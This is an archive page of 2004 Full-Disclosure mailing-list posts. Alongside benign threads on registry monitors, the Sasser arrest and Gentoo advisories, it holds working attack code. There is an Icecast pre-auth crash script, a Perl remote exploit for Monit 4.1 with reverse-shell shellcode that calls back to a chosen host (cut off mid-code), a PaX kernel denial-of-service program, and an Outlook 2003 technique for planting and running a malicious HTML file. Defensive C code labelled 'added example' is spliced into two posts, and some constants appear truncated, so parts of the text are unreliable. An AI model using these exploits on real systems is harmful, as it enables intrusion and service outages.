Re: [Full-Disclosure] Registry Watcher

2004-05-09 Thread Robert Kok
On Sat, 8 May 2004 18:00:57 -0500 RandallM [EMAIL PROTECTED] wrote:

> Any programs out there that watch changes to the registry and can give an
> alert?

Registry Prot and Autostart Viewer from DiamondCS Freeware 
http://www.diamondcs.com.au/index.php?page=products

RegRun 3 Security Suite
http://www.greatis.com/regrun3.htm

System Safety Monitor 
http://maxcomputing.narod.ru/indexe.html?lang=en (slow link)

-robert

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Registry Watcher

2004-05-09 Thread Steve Menard
Aditya, ALD [Aditya Lalit Deshmukh] wrote:
> > the common installation inserts and all programs have values that must be
> > inserted. If a watcher would have a data base to follow and any odd or
> > uncommon entries could be flagged. As far as I know all newly found viruses
> > insert registry entries and these could be placed in a data base that would
> > cause registry to deny and flag.
>
> viruses generally attack registry first because most of the application including
> os use registry for running properly.. so registry is the favorite target. but
> a virus can do much harm without changing registry also.
>
> hey for this sort of thing i use a program called proport; it watches all the
> autostart registry entries and alerts you when any new program is added to
> them. this program sits in the system tray so it is not obtrusive. download it
> from www.tudpage.com. you don't want regmon but proport for this sort of thing
>
> -aditya

I think it's supposed to be

www.tdupage.com



RE: [Full-Disclosure] Registry Watcher

2004-05-09 Thread Alan Melia \(Melmac\)
Greetings,

Personally, if you are running with least privilege then simply make the
registry read-only; ACLs can be applied to the registry too, you know. I've
worked with a couple of companies where we have made everything but the
necessary HKCU keys read-only. This stops rogue installs and even ActiveX
controls, as well as general fiddling that some users try to do.

I'd recommend the following reading.
http://support.microsoft.com/default.aspx?scid=kb;en-us;246261
http://www.microsoft.com/technet/prodtechnol/winntas/tips/winntmag/inreg.mspx
http://www.microsoft.com/security/guidance/topics/DesktopSecurity.mspx

Then there are the tools mentioned but I prefer to plan first and stick with
stuff that Microsoft has a responsibility to fix. 

Alan Melia

Melmac Solutions Ltd.

http://www.melmac.co.uk

 



[Full-Disclosure] Icecast 2.0.0 preauth overflow

2004-05-09 Thread ned
There exists a remotely exploitable heap overflow in Icecast 2.0.0.
The bug exists in the handling of base64 Authorization request.
This bug was found in about 40 seconds during a HTTP audit of the web 
component of Icecast with the fuzzer SMUDGE 
(http://felinemenace.org/~nd/SMUDGE/)

People complained that the last Icecast bugs weren't preauth. This one is.
Attached is a simple python script to reproduce the bug on the Windows 
platform. Our tests confirmed that some tweaking will crash linux version 
although this was not verified by the Icecast team.

Vendor == notified.

On another note this signifies the first release from the UBC.

thanks,
nd.


-- 
http://felinemenace.org/~nd
# will crash windows IceCast 2.0.0
# [EMAIL PROTECTED], 2004
# (Python 2: str is a byte string, so send() takes req as-is)

import socket

req = "GET /admin/ HTTP/1.0\r\n"
req += "Connection: Keep-Alive\r\n"
req += "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n"
req += "Host: 169.254.165.132:8000\r\n"
req += "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\n"
req += "Accept-Encoding: gzip\r\n"
req += "Accept-Language: en\r\n"
req += "Accept-Charset: iso-8859-1,*,utf-8\r\n"
req += "Authorization: Basic " + ("%0a" * 3000)   # oversized credential token
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8000))
s.send(req)
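As an added example (not Icecast code and not from the post above): a bounds-checked parser for a Basic Authorization header that refuses oversized or malformed tokens before anything is decoded, which is the check the bug class above lacks. The cap MAX_BASIC_TOKEN and all function names are assumptions of this example.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hard cap on the base64 credential token: an assumed policy value for this
 * example, not an Icecast constant. Longer tokens are refused before decoding. */
#define MAX_BASIC_TOKEN 256

static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode base64 from in[0..inlen) into out (capacity outcap). Returns the decoded
 * length, or -1 for malformed input or output that would not fit. The output bound
 * is derived from the input length before any byte is written, and a byte outside
 * the alphabet (such as the newlines the reproducer sends) is an error, not skipped. */
int b64_decode_bounded(const char *in, size_t inlen,
                       unsigned char *out, size_t outcap)
{
    if (inlen == 0 || inlen % 4 != 0) return -1;
    size_t pad = 0;
    if (in[inlen - 1] == '=') pad++;
    if (in[inlen - 2] == '=') pad++;
    size_t need = inlen / 4 * 3 - pad;
    if (need > outcap) return -1;
    size_t o = 0;
    for (size_t i = 0; i < inlen; i += 4) {
        unsigned int v[4];
        for (int k = 0; k < 4; k++) {
            char c = in[i + k];
            if (c == '=') {
                /* '=' may only pad the last two positions of the last group */
                if (i + 4 != inlen || k < 2) return -1;
                if (k == 2 && in[i + 3] != '=') return -1;
                v[k] = 0;
            } else {
                int d = b64val((unsigned char)c);
                if (d < 0) return -1;
                v[k] = (unsigned int)d;
            }
        }
        unsigned int triple = (v[0] << 18) | (v[1] << 12) | (v[2] << 6) | v[3];
        if (o < need) out[o++] = (unsigned char)(triple >> 16);
        if (o < need) out[o++] = (unsigned char)(triple >> 8);
        if (o < need) out[o++] = (unsigned char)triple;
    }
    return (int)o;
}

/* Parse the value of an "Authorization: Basic <token>" line into user and pass
 * (NUL-terminated, capacities usercap/passcap). Returns 0 on success, -1 when the
 * header is malformed, oversized, or does not fit the caller's buffers. */
int parse_basic_auth(const char *value, char *user, size_t usercap,
                     char *pass, size_t passcap)
{
    if (strncmp(value, "Basic ", 6) != 0) return -1;
    const char *p = value + 6;
    while (*p == ' ') p++;
    size_t toklen = strcspn(p, " \r\n");          /* token ends at blank or EOL */
    if (toklen == 0 || toklen > MAX_BASIC_TOKEN) return -1;
    unsigned char dec[MAX_BASIC_TOKEN];            /* 3/4 of the token always fits */
    int n = b64_decode_bounded(p, toklen, dec, sizeof dec);
    if (n <= 0) return -1;
    const unsigned char *colon = memchr(dec, ':', (size_t)n);
    if (colon == NULL) return -1;
    size_t ulen = (size_t)(colon - dec);
    size_t plen = (size_t)n - ulen - 1;
    if (ulen >= usercap || plen >= passcap) return -1;   /* room for the NUL */
    memcpy(user, dec, ulen); user[ulen] = '\0';
    memcpy(pass, colon + 1, plen); pass[plen] = '\0';
    return 0;
}

/* Check helper: does hdr decode to exactly user:pass? */
int basic_auth_matches(const char *hdr, const char *user, const char *pass)
{
    char u[64], p[64];
    if (parse_basic_auth(hdr, u, sizeof u, p, sizeof p) != 0) return 0;
    return strcmp(u, user) == 0 && strcmp(p, pass) == 0;
}

/* Check helper: "Basic " followed by n copies of fill (the shape of the
 * reproducer above, constructed here). Returns 1 if the parser rejects it. */
int flood_is_rejected(size_t n, char fill)
{
    char *hdr = malloc(n + 7);
    if (hdr == NULL) return 0;
    memcpy(hdr, "Basic ", 6);
    memset(hdr + 6, fill, n);
    hdr[6 + n] = '\0';
    char u[64], p[64];
    int rc = parse_basic_auth(hdr, u, sizeof u, p, sizeof p);
    free(hdr);
    return rc == -1;
}
```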


Re: [Full-Disclosure] Victory day - Sasser surrenders

2004-05-09 Thread Lan Guy


"Microsoft Reward Program Helps Lead to Information Resulting in Arrest Related to Sasser Internet Worm"

http://www.microsoft.com/presspass/press/2004/may04/05-08SasserTelePR.asp

- Original Message - 
From: Aditya, ALD [Aditya Lalit Deshmukh] [EMAIL PROTECTED]
To: Poof [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Sunday, May 09, 2004 7:05 AM
Subject: RE: [Full-Disclosure] Victory day - Sasser surrenders

> > You're kidding there, right?
>
> no the person who made the statement below actually oversaw all the
> details of the transfer!
>
> > > And a few months ago, a large amount of money was transferred to his
> > > account from a couple of popular antivirus vendors :)

Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

RE: [Full-Disclosure] Victory day - Sasser surrenders

2004-05-09 Thread Jelmer

-2 doublepost


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Geoff Shively
Sent: Saturday 8 May 2004 20:28
To: Feher Tamas; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Victory day - Sasser surrenders

HANOVER, Germany (Reuters) - A tip from reward-seekers and information from
Microsoft led to the arrest of an 18-year-old suspected of creating the
Sasser computer worm, German police and the software giant said on
Saturday. 

Spokesman Frank Federau for Lower Saxony police said police were certain
they had the man behind one of the Internet's most costly outbreaks of
sabotage. 

http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5080701

Cheers,

Geoff Shively

PivX Solutions, Inc.

Stock Symbol: (OCTBB:DRIL.OB)

-Original Message- 
From: Feher Tamas [mailto:[EMAIL PROTECTED] 
Sent: Sat 5/8/2004 4:32 AM 
To: [EMAIL PROTECTED] 
Cc: 
Subject: [Full-Disclosure] Victory day - Sasser surrenders



http://news.bbc.co.uk/1/hi/world/europe/3695857.stm 

Alleged Sasser LSASS worm creator J. Sven (probably the same 
teenager who wrote some of the later Netsky variants) was arrested 
by police in the northern German town of Rotenburg. 

Rumor says it was the CIA or FBI who tracked him. 

Sincerely: Tamas Feher, Hungary. 



[Full-Disclosure] List Charter

2004-05-09 Thread John Cartwright
[Full-Disclosure] Mailing List Charter
John Cartwright [EMAIL PROTECTED] and Len Rose [EMAIL PROTECTED]
 
Introduction & Purpose
----------------------
 
This document serves as a charter for the [Full-Disclosure] mailing
list hosted at lists.netsys.com.
 
The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with security issues and their discussion.  The list is
administered by Len Rose and John Cartwright.

Subscription Information
------------------------

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.netsys.com/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
[EMAIL PROTECTED], send the word 'help' in 
either the message subject or body for details.
 
Moderation & Management
-----------------------
 
The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to
accept submissions from non-members based on individual merit and
relevance.
 
It is expected that the list will be largely self-policing; however, in
special circumstances (e.g. spamming, misappropriation) offending
members may be removed from the list by the management.
 
An archive of postings is available at
http://lists.netsys.com/pipermail/full-disclosure/
 
Acceptable Content
--
 
Any information pertaining to vulnerabilities is acceptable, for
instance announcement and discussion thereof, exploit techniques and
code, related tools and papers, and other useful information.
 
Gratuitous advertisement, product placement, or self-promotion is
forbidden.  Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive.
Politics should be avoided at all costs.
 
Members are reminded that due to the open nature of the list, they
should use discretion in executing any tools or code distributed via
this list.
 
Posting Guidelines
--
 
The primary language of this list is English. Members are expected to
maintain a reasonable standard of netiquette when posting to the list.
 
Quoting should not exceed that which is necessary to convey context,
this is especially relevant to members subscribed to the digested
version of the list.
 
The use of HTML is discouraged, but not forbidden. Signatures will
preferably be short and to the point, and those containing
'disclaimers' should be avoided where possible.
 
Attachments may be included if relevant or necessary (e.g. PGP or
S/MIME signatures, proof-of-concept code, etc) but must not be active
(in the case of a worm, for example) or malicious to the recipient.
 
Vacation messages should be carefully configured to avoid replying to
list postings. Offenders will be excluded from the mailing list until
the problem is corrected.

Members may post to the list by emailing [EMAIL PROTECTED]. Do not send
subscription/unsubscription mails to this address; use the -request
address mentioned above.
 
Charter Additions/Changes
-
 
The list charter will be published at
http://lists.netsys.com/full-disclosure-charter.html
 
In addition, the charter will be posted monthly to the list by the
management.  

Alterations will be made after consultation with list members and a
consensus has been reached.



[Full-Disclosure] [ GLSA 200405-01 ] Multiple format string vulnerabilities in neon 0.24.4 and earlier

2004-05-09 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200405-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Multiple format string vulnerabilities in neon 0.24.4 and
earlier
  Date: May 09, 2004
  Bugs: #48448
ID: 200405-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

There are multiple format string vulnerabilities in libneon which may
allow a malicious WebDAV server to execute arbitrary code.

Background
==

neon provides an HTTP and WebDAV client library.

Affected packages
=

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                Unaffected
    -------------------------------------------------------------------
  1  net-misc/neon           <= 0.24.4                       >= 0.24.5

Description
===

There are multiple format string vulnerabilities in libneon which may
allow a malicious WebDAV server to execute arbitrary code under the
context of the process using libneon.

Impact
==

An attacker may be able to execute arbitrary code under the context of
the process using libneon.

Workaround
==

A workaround is not currently known for this issue. All users are
advised to upgrade to the latest version of the affected package.

Resolution
==

Neon users should upgrade to version 0.24.5 or later:

# emerge sync

# emerge -pv =net-misc/neon-0.24.5
# emerge =net-misc/neon-0.24.5

References
==

  [ 1 ] CVE
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0179

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200405-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0




[Full-Disclosure] [ GLSA 200405-02 ] Multiple vulnerabilities in LHa

2004-05-09 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200405-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Multiple vulnerabilities in LHa
  Date: May 09, 2004
  Bugs: #49961
ID: 200405-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two stack-based buffer overflows and two directory traversal problems
have been found in LHa. These vulnerabilities can be used to execute
arbitrary code or as a denial of service attack.

Background
==

LHa is a console-based program for packing and unpacking LHarc
archives.

Affected packages
=

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                Unaffected
    -------------------------------------------------------------------
  1  app-arch/lha            <= 114i-r1                      >= 114i-r2

Description
===

Ulf Harnhammar found two stack overflows and two directory traversal
vulnerabilities in LHa version 1.14 and 1.17. A stack overflow occurs
when testing or extracting archives containing long file or directory
names. Furthermore, LHa doesn't contain sufficient protection against
relative or absolute archive paths.

Impact
==

The stack overflows can be exploited to execute arbitrary code with the
rights of the user testing or extracting the archive. The directory
traversal vulnerabilities can be used to overwrite files in the
filesystem with the rights of the user extracting the archive,
potentially leading to denial of service or privilege escalation. Since
LHa is often interfaced to other software like an email virus scanner,
this attack can be used remotely.
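An added example, not LHa's own code: a check for archive member names that bounds the copy into a fixed name buffer and refuses absolute paths, drive letters and "." or ".." components, covering both problems the description above reports. LHA_NAME_MAX and the function names are assumptions of this example.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Assumed capacity of the extractor's fixed name buffer; not LHa's value. */
#define LHA_NAME_MAX 256

/* Returns 1 if an archive member name may be written under the extraction
 * directory, 0 otherwise. Both '/' and '\\' count as separators, since LHarc
 * archives come from DOS as well as Unix. */
int lha_entry_name_is_safe(const char *name, size_t namelen)
{
    if (namelen == 0 || namelen >= LHA_NAME_MAX) return 0;  /* bound the copy */
    if (memchr(name, '\0', namelen) != NULL) return 0;      /* embedded NUL */
    if (name[0] == '/' || name[0] == '\\') return 0;        /* absolute path */
    if (namelen >= 2 && name[1] == ':') return 0;           /* drive letter */

    /* Walk the components: reject ".", "..", and empty inner components. */
    size_t start = 0;
    for (size_t i = 0; i <= namelen; i++) {
        if (i == namelen || name[i] == '/' || name[i] == '\\') {
            size_t clen = i - start;
            if (clen == 0 && i != namelen) return 0;        /* "a//b" */
            if (clen == 1 && name[start] == '.') return 0;
            if (clen == 2 && name[start] == '.' && name[start + 1] == '.')
                return 0;
            start = i + 1;
        }
    }
    return 1;
}

/* Copy a header name into dst only after it passed the check; the length test
 * runs before memcpy, which is the step missing behind a stack overflow on long
 * names. Returns 0 on success, -1 if the name was rejected. */
int lha_copy_entry_name(char *dst, size_t cap, const char *name, size_t namelen)
{
    if (cap == 0 || namelen >= cap) return -1;
    if (!lha_entry_name_is_safe(name, namelen)) return -1;
    memcpy(dst, name, namelen);
    dst[namelen] = '\0';
    return 0;
}

/* Check helper: copy name into a 32-byte buffer and verify it round-trips. */
int copy_roundtrip_ok(const char *name)
{
    char buf[32];
    if (lha_copy_entry_name(buf, sizeof buf, name, strlen(name)) != 0) return 0;
    return strcmp(buf, name) == 0;
}

/* Check helper: a constructed name of n 'A's, like an oversized header field.
 * Returns 1 if the check rejects it. */
int long_name_is_rejected(size_t n)
{
    char *name = malloc(n);
    if (name == NULL) return 0;
    memset(name, 'A', n);
    int rejected = !lha_entry_name_is_safe(name, n);
    free(name);
    return rejected;
}
```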

Workaround
==

There is no known workaround at this time. All users are advised to
upgrade to the latest available version of LHa.

Resolution
==

All users of LHa should upgrade to the latest stable version:

# emerge sync

# emerge -pv =app-arch/lha-114i-r2
# emerge =app-arch/lha-114i-r2

References
==

  [ 1 ] CAN-2004-0234
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0234
  [ 2 ] CAN-2004-0235
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0235

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200405-02.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0



Re: [Full-Disclosure] Registry Watcher

2004-05-09 Thread James Riden
RandallM [EMAIL PROTECTED] writes:

> Hi,
>
> Any programs out there that watch changes to the registry and can give an
> alert?

RegMon from sysinternals.com. There are a whole load of useful Windows
tools at that site.

cheers,
 Jamie
-- 
James Riden / [EMAIL PROTECTED] / Systems Security Engineer
Information Technology Services, Massey University, NZ.
GPG public key available at: http://www.massey.ac.nz/~jriden/



[Full-Disclosure] Policy measurement and compliance tools

2004-05-09 Thread n30
Fellows

Looking for tools that measure security policy in an organization.
The only one I know is Symantec Enterprise Security Manager (ESM).

Any others??

Thanks in advance!!
-n



[Full-Disclosure] Monit 4.1 remote shell exploit (HTTP)

2004-05-09 Thread Michel Blomgren
Here's an oldie for a simple buffer overflow vuln.

Read more here: http://www.securityfocus.com/bid/9099/discussion/

If I've been correctly informed, the public exploit out there
only DoSes (I haven't tested it, so I really can't say). Anyway,
this one's an over-hacked reverse shellcode variant...
discard it in any degree you like.

// Michel, http://www.cycom.se

#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger [EMAIL PROTECTED]
#
# Verbatim copying, distribution and/or modification of this
# code is permitted without restriction.
#
# THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES  OF  MERCHANTABILITY,  FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR  COPYRIGHT  HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE,  ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# You may have to install Math::XOR for this to run, e.g.:
# $ perl -MCPAN -e "install Math::XOR"
#
# Acknowledgments: Sabu, Nullbyte
#

use POSIX;
use Getopt::Std;
use IO::Socket::INET;
use Math::XOR;
use strict;

sub usage {
    print "usage: sploit [-a 0xbf7ff9e4] [-o 250] target_host [port]\n" .
          "-a address   ret address to make eip\n" .
          "-o offset    offset to subtract from address before injecting it\n" .
          "-c hostname  choose hostname to have the shellcode connect back to, default\n" .
          "             is localhost\n" .
          "-p port      choose port to have the shellcode connect back to, default is\n" .
          "             31337.\n" .
          "-B           use x86 *BSD shellcode instead of x86 Linux\n" .
          "  The default address is 0xbf7ff9e4 and the default offset to subtract from that\n" .
          "  address is 250, this works under Slackware 8.1 with default ./configure\n" .
          "  compilation options. You may have to do some research for your system, gdb is\n" .
          "  your friend, e.g. \"gdb process pid_of_monit_httpd\".\n";
    exit 1;
}

# pre_shellcode was added to make sure the stack doesn't write into our
# shellcode
my $pre_shellcode = "\x83\xC4\x40";  # add esp, byte 0x40

my $linux_shellcode = # shadowinteger's reverse shellcode (sishell, x86 linux)
    "\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb" .
    "\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6" .
    "\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff" .
    "\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83" .
    "\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24" .
    "\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80" .
    "\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80" .
    "\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89" .
    "\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89" .
    "\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80" .
    "\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e" .
    "\x2f\x73\x68\x24";
my $lin_IP_OFFSET = 40;
my $lin_PORT_OFFSET = 54;
my $lin_XOR = 0x;   # number to xor the ip address with


my $bsd_shellcode = # shadowinteger's reverse shellcode (sishell, x86 bsd)
    "\xeb\x55\x5d\x6a\x06\x6a\x01\x6a\x02\x31\xc0\xb0\x61\x50\xcd\x80" .
    "\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8" .
    "\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69" .
    "\x89\x44\x24\x04\x8d\x04\x24\x6a\x10\x50\x57\x31\xc0\xb0\x62\x50" .
    "\xcd\x80\x72\x3b\x31\xc9\x51\x57\x31\xc0\xb0\x5a\x50\xcd\x80\x41" .
    "\x80\xf9\x02\x77\x04\xeb\xef\xeb\x2e\x83\xec\x10\x8d\x44\x24\x08" .
    "\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x8d\x14\x24" .
    "\x89\xd1\x53\x51\x88\x5d\x07\x55\x31\xc0\xb0\x3b\x50\xcd\x80\x31" .
    "\xc0\x50\xfe\xc0\x50\xcd\x80\xe8\x76\xff\xff\xff\x2f\x62\x69\x6e" .
    "\x2f\x73\x68\x24";
my $bsd_IP_OFFSET = 32;
my $bsd_PORT_OFFSET = 46;
my $bsd_XOR = 0x;


# just define these here, since we're strict
my $shellcode;
my $IP_OFFSET;
my $PORT_OFFSET;
my $XOR;


# set up defaults

my $offset = 250; # offset to back-track (subtract) from $address
my $address = 0xbf7ff9e4;

my $target = "localhost";
my $port = 2812;

my $callback_host = "localhost";
my $callback_port = pack('n', 31337);


# handle options

my %options = ();
getopts("a:o:c:p:Bh", \%options);

if ( defined $options{h} ) {
    usage();
}
if ( ! $ARGV[0]) {
    usage();
} else {
    if ( length($ARGV[0]) > 0 ) {
        $target = $ARGV[0];
    }
}
if ( $ARGV[1]) {
    $port = $ARGV[1];
}

# if -B option is present, define $bsd
my $bsd = "yes" if defined $options{B};

if ( defined $options{a} ) {
    $address = hex($options{a});
}
if ( defined $options{o} ) {
    $offset = $options{o};
}
if ( defined $options{c} ) {
    if ( length($options{c}) > 0 ) {
        $callback_host = $options{c};
    }
}
if ( defined 

[Full-Disclosure] PaX DoS proof-of-concept

2004-05-09 Thread Michel Blomgren
/*
  PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
  by Shadowinteger [EMAIL PROTECTED]
  2004-05-04

  Written after reading the security advisory posted by borg (ChrisR-) on
  Bugtraq 2004-05-03 (my time). ChrisR - www.cr-secure.net

  Acknowledgments: sabu (www.sabu.net)


  Vulnerability:
    PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
    (function in mm/mmap.c) is vulnerable to a local Denial of Service attack
    because of a bug that puts the kernel into an infinite loop.

    Read the security advisory for more info:
    http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0


  Exploitation:
    We need to get past the following line of code in
    arch_get_unmapped_area() to succeed with a DoS:
        if (TASK_SIZE - len < addr) { ...

    We do it like this:

        TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL

    DOSVAL is the value we'll use.

    arch_get_unmapped_area() does the following:

        if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code.
    (TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.

    A DOSVAL of e.g. 0x8000 or above will work most times, no real need
    for the funky calculation above.

    There are quite a few functions available that are front-ends to
    arch_get_unmapped_area(). This exploit uses good-old mmap().


  Tiny DoS PoC:

    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/mman.h>
    int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa000,PROT_READ,MAP_PRIVATE,fd,0);}

*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

#define TASK_SIZE 0xc000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x0400

#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK)

int main() {
    int fd = open("/dev/zero", O_RDONLY);

    printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n"
           "by Shadowinteger [EMAIL PROTECTED] 20040504\n"
           "created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n"
           "ChrisR - www.cr-secure.net\n"
           "\n"
           "the exploit binary must be marked PF_PAX_RANDMMAP to work!\n"
           "\n"
           "greetz goes to: sabu (www.sabu.net)\n"
           "\n"
           "--\n"
           "will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n"
           "\n"
           "if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n"
           "are you sure you want to continue? [type Y to continue] ", DOSVAL);
    fflush(stdout);

    if (getchar() != 'Y') {
        printf("aborted.\n");
        return 0;
    }

    printf("\n"
           "attempting to DoS...\n");

    if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {
        perror("mmap");
    }

    printf("your kernel does not seem to be vulnerable! :)\n");

    return 0;
}


-- 
Michel Blomgren
Cycom AB
http://www.cycom.se
__
PGP: http://www.cycom.se/misc/pubkeymichel.asc
886A 7B17 1747 6C82 7A7E
EAC0 A3F1 2943 101C 18FA



[Full-Disclosure] OUTLOOK 2003: OuchLook

2004-05-09 Thread [EMAIL PROTECTED]


Sunday, May 09, 2004

Outlook 2003, the premier mail client from the company 
called 'Microsoft', certainly appears to have a lot of security 
features built into it.  Cursory examination shows excellent 
thought into 'spam' containment, 'security' consideration and 
many other little 'things'.

However, there is a fundamental flaw with this particular device. 
That is, it copies our arbitrary file with a given name into a 
known and easily reachable location:

<img src="malware.htm" style="display:none">

when embedded into the body of a mail message, it will, when the 
recipient replies, copy itself into the temp folder:

C:\Documents and Settings\user name\Local 
Settings\Temp\malware.htm

This location can be quite easily reached without having to know 
the user name [courtesy of jelmer]:

<a href="shell:user profile\\local settings\\temp\\malware.htm">http://office.microsoft.com/</a>

The scenario is 'painstakingly' trivial. Send your cohort at 
the office an email that requires a reply. Embed in it an html 
file out of sight. Either send them a second message with any 
number of 'spoofed' url schemes pointing to the file in the 
temp folder, or direct them to a web site which will reach into the 
temp folder via the same url and install and run our malicious 
software.


Very Silly Design Error.

End Call

-- 
http://www.malware.com








[Full-Disclosure] CSA-200402-1: Previous Open Webmail vulnerability is exploitable

2004-05-09 Thread Michel Blomgren

  Cycom AB Security Advisory CSA-200402-1
www.cycom.se

 Advisory: Previous Open Webmail vulnerability is exploitable
 Date: Sat Feb 21 15:18:21 CET 2004,
   updated: Thu May  6 10:37:29 CEST 2004
  Application: Open Webmail 2.20, 2.21 and 2.30 (and -current)
Vulnerability: Remote arbitrary command execution
 Availability: http://openwebmail.org
Platforms: OS independent (multiple *NIXes)
   Status: Patch is available (included in this advisory)
Reference: CSA-200402-1
   Author: Michel Blomgren [EMAIL PROTECTED]

SYNOPSIS

Open WebMail is a webmail system based on the Neomail version 1.14
